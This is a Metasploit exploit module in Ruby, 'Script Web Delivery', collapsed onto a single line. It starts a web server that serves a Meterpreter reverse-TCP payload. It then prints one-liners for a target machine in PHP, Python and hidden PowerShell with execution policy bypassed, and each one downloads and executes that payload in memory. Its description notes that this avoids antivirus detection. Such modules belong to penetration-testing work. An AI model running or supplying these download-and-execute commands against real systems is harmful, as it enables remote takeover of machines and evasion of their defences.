## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer def initialize(info = {}) super(update_info(info, 'Name' => 'Script Web Delivery', 'Description' => %q{ This module quickly fires up a web server that serves a payload. The provided command will start the specified scripting langauge interpreter and then download and execute the payload. The main purpose of this module is to quickly establish a session on a target machine when the attacker has to manually type in the command himself, e.g. Command Injection, RDP Session, Local Access or maybe Remote Command Exec. This attack vector does not write to disk so is less likely to trigger AV solutions and will allow privilege escalations supplied by Meterpreter. }, 'License' => MSF_LICENSE, 'Author' => [ 'Andrew Smith "jakx" ', 'Ben Campbell ', 'Chris Campbell' #@obscuresec - Inspiration n.b. no relation! ], 'DefaultOptions' => { 'Payload' => 'python/meterpreter/reverse_tcp' }, 'References' => [ [ 'URL', 'http://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html'], [ 'URL', 'http://www.pentestgeek.com/2013/07/19/invoke-shellcode/' ], [ 'URL', 'http://www.powershellmagazine.com/2013/04/19/pstip-powershell-command-line-switches-shortcuts/'], [ 'URL', 'http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html'] ], 'Platform' => %w{ py php win}, 'Targets' => [ [ 'Automatic', { } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'N/A' )) register_options( [ OptString.new('SCRIPT_LANG', [true, 'Scripting Language to use: PY, PHP, or PSH,', 'PY']), ], self.class) end def on_request_uri(cli, request) print_status("Delivering Payload") if (datastore['SCRIPT_LANG'] == "PSH") data = Msf::Util::EXE.to_win32pe_psh_net(framework, payload.encoded) else data = %Q|#{payload.encoded} | end send_response(cli, data, { 'Content-Type' => 'application/octet-stream' }) end def primer url = get_uri() p = datastore['Payload'] if (datastore['SCRIPT_LANG'] == "PHP") if (p[0..2] == "php") print_status("Run the following command on the target machine:") print_line("For Linux: php -r \"eval(file_get_contents('#{url}'));\"") print_line("For Windows: php.exe -r \"eval(file_get_contents('#{url}'));\"") else print_error("Payload currently unsupported by PHP. You will need to use a native PHP payload, such as php/meterpreter") return end elsif (datastore['SCRIPT_LANG'] == "PY") if (p[0..5] == "python") print_status("Run the following command on the target machine:") print_line("For Linux: python -c \"import urllib2; r = urllib2.urlopen('#{url}'); exec(r.read());\"") print_line("For Windows: python.exe -c \"import urllib2; r = urllib2.urlopen('#{url}'); exec(r.read());\"") else print_error("Payload currently unsupported by Python. You will need to use a native python payload, such as python/meterpreter") return end elsif (datastore['SCRIPT_LANG'] == "PSH") download_and_run = "IEX ((new-object net.webclient).downloadstring('#{url}'))" print_status("Run the following command on the target machine:") print_line("powershell.exe -w hidden -nop -ep bypass -c \"#{download_and_run}\"") else print_error("You did not specify a valid scripting language. Exiting...") return end end end